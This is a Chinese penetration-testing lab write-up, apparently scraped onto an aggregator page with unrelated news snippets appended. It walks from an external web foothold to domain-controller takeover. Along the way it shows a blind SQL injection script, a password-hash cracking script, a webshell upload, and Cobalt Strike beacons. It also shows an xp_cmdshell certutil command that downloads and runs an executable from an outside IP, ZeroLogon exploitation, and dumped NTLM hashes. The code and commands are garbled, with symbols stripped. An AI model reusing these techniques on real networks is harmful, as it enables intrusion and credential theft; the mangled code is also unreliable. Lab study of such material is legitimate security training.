安庆大理运城常德铜陵江西
投稿投诉
江西南阳
嘉兴昆明
铜陵滨州
广东西昌
常德梅州
兰州阳江
运城金华
广西萍乡
大理重庆
诸暨泉州
安庆南充
武汉辽宁

域渗透之外网打点到三层内网

8月20日 拭朱砂投稿
  环境搭建1。项目介绍:
  本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobaltstrike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点进入内网,详细介绍外网各种打点方法,学习到行业流行的内网渗透测试办法,对个人提升很有帮助。2。VPS映射
  1。将ip映射到公网。在公网vps使用配置frp工具的frps。ini运行frps。execfrps。ini
  在web1上配置frpc。ini运行frpc。execfrp。ini
  成功访问到环境
  http:x。x。x。x:8088login。jsp
  信息收集1。端口探测
  使用nmap进行端口探测,发现4444、5003、8088、8899、8878端口开放。
  然后查看其详细信息。
  2。网站源代码查找
  发现有一个网上银行系统。使用弱口令和暴力破解,没有爆破出弱口令用户。
  然后就在github试试运气,发现了源码。
  源码地址:https:github。comamateurRDnetBankSystem
  发现了一个数据库文件,有一些普通用户和管理员用户的账户和密码。
  3。SQL注入
  然后进行登录测试,发现存在sql注入漏洞
  网上银行系统Hsql注入漏洞
  使用sqlmap不能进行跑出用户名和密码。
  4。编写脚本进行sql注入coding:utf8importrequestspasswordurl〔http:x。x。x。x:8878adminlogin〕(http:103。121。93。206:8878adminlogin)payload0123456789abcdefghijklmnopqrstuvwxyzpasswordforiinrange(1,20):forjinpayload:expadminand(selectsubstring(password,s,1)fromAdmin)likesor1(i,j)print(正在注入)data{admin。username:exp,admin。password:aaaa,type:1}reqrequests。post(urlurl,datadata);if密码不正确inreq。text:passwordjbreakprint(password)
  成功跑出密码。然后进行登录。
  登录之后,寻找文件上传或者可以获取到webshell的地方,发现没有可利用点。
  5。tomexamSQL注入漏洞
  在另一个地址处,发现可以注册用户。然后注册用户进行登录。
  登录之后发现,某处存在sql注入。
  使用sqlmap进行获取用户信息。
  1113999999991超级管理员adminadmin17D03DA6474CE8BEB13B01E79F789E632022040900:14:08301
  621eu3eu34124DDEBABDF97C2430274823B3184D4(eu3)2014051713:58:4914
  成功抓到了管理员用户和密码,然后使用md5进行解密。
  成功进行登录。登录之后没有找到可getshell的地方。
  6。JspxcmsSQL注入
  首页发现可以注册用户和进行登录。首先搜索历史漏洞,看看有没有getshell的地方。
  发现先知的大佬做过找个版本的代码审计。参考链接:https:xz。aliyun。comt10891?page1toc7。发现可以通过文件上传进行gethshell。
  在之前的tomexam的数据库中,发现存在jspxcms,试试查找一下管理员的用户和信息。
  使用sqlmap进行查找表、用户和吗密码。
  成功发现了用户名和加密的密码。密码推断是明文密码salt然后再进行md5加密。
  7。编写解密脚本
  通过其源码,分析其加密方式,然后编写解密脚本。packagecom。jspxcms。importcom。jspxcms。common。security。SHA1CredentialsDimportcom。jspxcms。common。util。Eimportjava。io。Fimportjava。io。FileRimportjava。io。FileWimportjava。io。PrintWimportjava。util。SpublicclassTestmain{publicstaticvoidmain(String〔〕args)throwsException{byte〔〕saltEncodes。decodeHex(9b2b38ad7cb62fd9);SHA1CredentialsDigesttestnewSHA1CredentialsDigest();StringfileNameD:csdnpass。StringfileName2D:hashpassword2。try(ScannerscnewScanner(newFileReader(fileName))){while(sc。hasNextLine()){Stringlinesc。nextLine();StringencPasstest。digest(line,salt);FilefnewFile(fileName2);FileWriterfwnewFileWriter(f,true);PrintWriterpwnewPrintWriter(fw);pw。println(lineencPass);pw。close();}}}}
  8。登录jspxcms后台getshell
  使用管理员用户和解密出来的密码,成功进入管理员后台。
  使用哥斯拉生成一个木马,然后使用jar,打包成为war包。
  9。编写目录穿越脚本
  根据先知社区的大佬提出的方法,编写目录穿越脚本。
  成功进行上传。
  10。获取webshell
  使用哥斯拉连接webshell,成功执行命令。
  内网渗透:1。frp反向代理上线CS
  首先配置内网cobaltstrike内网上线
  在kali启动cs服务端,
  查看其端口
  配置frp的frps。ini信息。
  2。CS上线
  cs生成监听。
  然后上传。exe文件进行上线。
  成功上线。
  3。内网信息收集
  使用shelliponfig收集信息。
  根据搭建的拓扑环境,然后测试一下与其他域内主机的连通性。
  查看计算机名。
  使用netview查找域内其它主机,发现不能找到其他主机。
  4。开启代理进行端口扫描
  查看server2012的IP地址。
  5。域内主机端口扫描
  发现存在1433Mysql的端口,尝试进行弱口令的暴力破解。
  最好成功爆破出账号和密码。
  6。mssqlclient登录Mssql服务器
  使用mysql用户和密码进行登录。
  7。xpcmshell进行getshell
  help查看可以执行那些命令。
  开启xpcmdshell,然后进行信息收集。
  使用certutil远程下载之前的木马,然后进行上线
  xpcmdshellcertutilurlcachesplitfhttp:39。103。134。134artifact。exe
  c:windowstempartifact。exe
  8。使用SweetPotato(ms16075)提权
  上线之后,进行简单的信息收集。
  然后使用第三方插件,利用SweetPotato(ms16075)提权对其进行提权。
  成功提权。
  内网域渗透1。内网域信息收集
  使用netview查看域内主机。
  使用hashdump进行抓取一些用户的hash值。
  查看主机ip地址。
  查看域控的Ip地址,和域控的计算机名。
  2。ZeroLogonCVE20201472获取域控权限
  编译zerolgin的脚本成为exe,然后进行测试,发现主机存在该漏洞。
  将它设置为空密码。31d6cfe0d16ae931b73c59d7e0c089c0
  3。配置代理,登录域控
  配置kali的代理地址,然后进行端口扫描,测试代理是否连接。
  获取域控的hash值。
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
  sec123。cnkcnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
  AD01:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  SERVER2012:1109:aad3b435b51404eeaad3b435b51404ee:cc759f89477f1595c993831ce5944e95:::
  然后进行登录域控。
  4。PTH上线CS
  关闭防火墙,利用pth进行上线cs。
  成功执行命令。
  生成tcp监听,然后jump到域控主机。
  5。恢复密码、原hash。
  恢复密码。
  使用secretsdump。py获取其hash值。
  python3secretsdump。pysamsam。savesystemsystem。savesecurity
  security。saveLOCA
  使用:proxychains4python3reinstalloriginalpw。pyad0110。10。10。139
  fb61e3c372e666adccb7a820aa39772f恢复域控密码。成功恢复其密码。
  靶机到这里就结束了。
  最后,成功拿下整个域控。
  总结:
  该项目从环境搭建,使用vps将web1主机映射到公网上。通过信息收集,搜索源码,然后分析源码,进行sql注入。编写sql注入脚本进行注入,通过分析登录端的源码编写加密脚本,在编写目录穿越脚本成功获取webshell。在内网渗透中,使用frp反向代理上线cs,使用xpcmdshell进行getshell。在域渗透中使用CVE20201472获取域控权限。这台靶机中没装杀软,但是从外网打点到内网渗透,再到域渗透中的知识面是非常广的。
  申明:本文仅供技术交流,请自觉遵守网络安全相关法律法规,切勿利用文章内的相关技术从事非法活动,如因此产生的一切不良后果与文章作者无关本文原创作者:vghost
投诉 评论 转载

CBA中职篮辽宁队蒋兴权引退的原因应该是和郭艾伦转会有关辽宁队是一只特殊的球队,特殊在辽宁队的一半控制在体制内,简单的说之前北京首钢想引进韩德君,给出的条件地球人都无法拒绝,但是辽宁队一条就留住了韩德君,就是把韩德君拉入到体制内,也……顶级后卫加盟中国篮坛豪门!携手辽宁名帅冲击总冠军在中国篮坛,能够称为豪门的球队不多,特别是WCBA赛场,而四川女篮却成为了新崛起的土豪球队,她们连续两个赛季引进中国女篮名将,其中包括了邵婷、韩旭、李梦这样的当红国手,不过遗憾……国家出手!央妈出招!房子现在到底能不能买?自从疫情爆发一来房地产可谓是一路低迷,也是赶上国家房住不炒的政策,房地产市场是一落千丈!到现在国家排名前百的房企没有暴雷的一只手也能数的过来吧。图片来源网络虽说初衷……域渗透之外网打点到三层内网环境搭建1。项目介绍:本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各……隐入尘烟票房1。1亿,农村穷小子导演李睿珺能分到多少?金秋九月,文艺片《隐入尘烟》完美收官下线,总共创下1。1亿元的惊人票房成绩。其实若说惊人,1。1亿这个数字对于动辄几十亿票房的爆款影片来说根本算不得什么,甚而有些寒酸。……游戏知识科普什么是肉鸽?为何玩肉鸽游戏会让人停不下来?玩家们如果有时常关注游戏界的话,那么对于近年突然兴起的游戏类型Roguelike(肉鸽应该不会感到陌生。Roguelike到底是什么游戏?为什么会叫做这个名字呢?很……Cpu盒装和散片区别Cpu盒装和散片区别CPU叫做中央处理器,是一块超大规模的集成电路,它的主要功能是解释计算机指令以及处理计算机软件中的数据。通常包括运算器、高速缓冲存储器以及实现他们之间……剧本杀告别诗告白诗复盘解析玩法凶手是谁含剧透慎看剧本杀《告别诗告白诗》全盘解析:《告别诗告白诗》主要讲述关于六个孩子在青春岁月中发生的牵绊和爱情故事。整体体量适中,文笔细腻,阅读感舒适,故事有侧有重,剧情走向脉络清晰,……端午放大招!鹤山5星东古度假酒店,顶级奢华两日游,含自助晚餐【鹤山东古玥湖酒店】周年庆爆品回归!仅599抢玥湖园景房自助早餐自助晚餐等!点开我的头像,再点底部【活动资讯】,搜索关键词东古下单预定改变扭曲的跑道,以无法控制的方……特纳3712哈里伯顿2013步行者力克鹈鹕NBA常规赛11月8日继续进行,最终,步行者以129122战胜鹈鹕。首节开始,哈里伯顿接连助攻队友得分帮助步行者打出90开局!锡安三分、琼斯上篮止血,但是杰伦史密斯和特纳……移动智能演绎懂你生活生活有千般面孔,供我们自主选择,喜怒哀乐,藏于其中。过自己理想中的生活,需要敢于选择的勇气和一颗精致的心。智能生活的时代已经开始,在不久的将来,人工智能与生活彻底的互联互通,将……能够享受到完整一天时间的蓝牙耳机市面的蓝牙耳机不仅品牌众多,而且各式各样的蓝牙耳机都有,很多购买的蓝牙耳机的人都会被挑的眼花缭乱,今天小编主要推荐的就是那些续航时间超多的蓝牙耳机,玩一整天那是没问题的,那都有……
西班牙人正式官宣!恭喜海港,武磊前队友高调加盟气候变暖下,世界顶级旅游胜地瑞士的变化真快!解立彬刚上任北京主帅,爱将收获2年续约,李慕豪位置不稳脱毛仪可以两个人共用吗?从马拉多纳一生最经典的比赛过程,来正确看待丢失球权数据又一加密货币公司遭黑客攻击被盗价值11亿元虚拟货币真相大白法拉利的左后胎去哪了小米充电宝5000mAh口红版发布5000mAh20W快充,真相大白!大连队确实违规,就算富力吃相难看,但勿将足协当痰盂羊了个羊后的自述世界杯明星西班牙11德国,黄健翔发分析数据还是靠冲击靠中锋续命,是学艺11月份汽车厂商销量排名比亚迪第一,吉利超越一汽大众成为第二开车十大禁忌以及十大解决的技巧方法引起肌肤问题的坏习惯瀛洲造句用瀛洲造句大全根据环境污染责任法污染环境需要承担什么责任?国际米兰向马库斯图拉姆提供了一份为期五年的合同灰色系发色有哪些流行的灰色系染发盘点新鱼塘放鱼苗为什么会死,鱼塘鱼苗死因有哪些建发致新集采冲击直销毛利,突击并购疑似增厚业绩IPO观察优秀作文期中考试之后手机号查基站定位软件(如何对别人手机号进行定位)酒店行政人事部年个人工作总结及年工作计划

友情链接:中准网聚热点快百科快传网快生活快软网快好知文好找七猫云易事利